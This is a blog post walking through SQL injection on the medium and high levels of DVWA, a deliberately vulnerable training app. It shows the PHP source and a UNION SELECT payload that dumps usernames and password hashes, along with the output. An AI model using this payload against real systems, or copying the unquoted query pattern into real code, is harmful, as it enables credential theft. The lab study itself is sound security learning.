SQL Injection DVWA Continued…

June 13, 2010 at 7:59 pm (PHP, Programming, Security, SQL, SQL Injection)

Hey,

So continuing on from the low level, let’s take a look at the medium level. Here is the code:

<?php
if (isset($_GET['Submit'])) {
// Retrieve data
$id = $_GET['id'];
$id = mysql_real_escape_string($id);
$getid="SELECT first_name, last_name FROM users WHERE user_id = $id";
$result=mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
$num=mysql_numrows($result);
$i=0;
while ($i < $num) {
$first=mysql_result($result,$i,"first_name");
$last=mysql_result($result,$i,"last_name");
echo '<pre>';
echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
echo '</pre>';
$i++;
}
}
?>

So as you can see it is exactly the same apart from the:

$id = mysql_real_escape_string($id);

The only thing that this prevents us from doing compared to the low level is, using quotes. So we can simply own the level in the same manner just removing the quotes we used, like so:

ID: 1 union all select user,password from dvwa.users--
First name: admin
Surname: admin
ID: 1 union all select user,password from dvwa.users--
First name: admin
Surname: bf03145925aadc81e733e788aaa58fe3
ID: 1 union all select user,password from dvwa.users--
First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03
ID: 1 union all select user,password from dvwa.users--
First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: 1 union all select user,password from dvwa.users--
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: 1 union all select user,password from dvwa.users--
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99

As you can see exactly the same way, the reason that we can’t use quotes is pretty self explanatory from looking at this page.

Let’s talk about the high level then, first let’s take a look at the code:

<?php
if(isset($_GET['Submit'])){
// Retrieve data
$id = $_GET['id'];
$id = stripslashes($id);
$id = mysql_real_escape_string($id);
if (is_numeric($id)){
$getid="SELECT first_name, last_name FROM users WHERE user_id = '$id'";
$result=mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
$num=mysql_numrows($result);
$i=0;
while ($i < $num) {
$first=mysql_result($result,$i,"first_name");
$last=mysql_result($result,$i,"last_name");
echo '<pre>';
echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
echo '</pre>';
$i++;
}
}
}
?>

This has a lot more sanitization and as far as I am aware it is not exploitable. The problem is the following bit of code:

// Retrieve data
$id = $_GET['id'];
$id = stripslashes($id);
$id = mysql_real_escape_string($id);
if (is_numeric($id)){
$getid="SELECT first_name, last_name FROM users WHERE user_id = '$id'";
$result=mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );

I know I can bypass the mysql_real_escape_string($id) from the medium level. I am just not sure and have not found a way to successfully circumvent the stripslashes() and is_numeric() functions. If anyone has a way to circumvent this please let me know!

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Cancel

Connecting to %s

Follow

Get every new post delivered to your Inbox.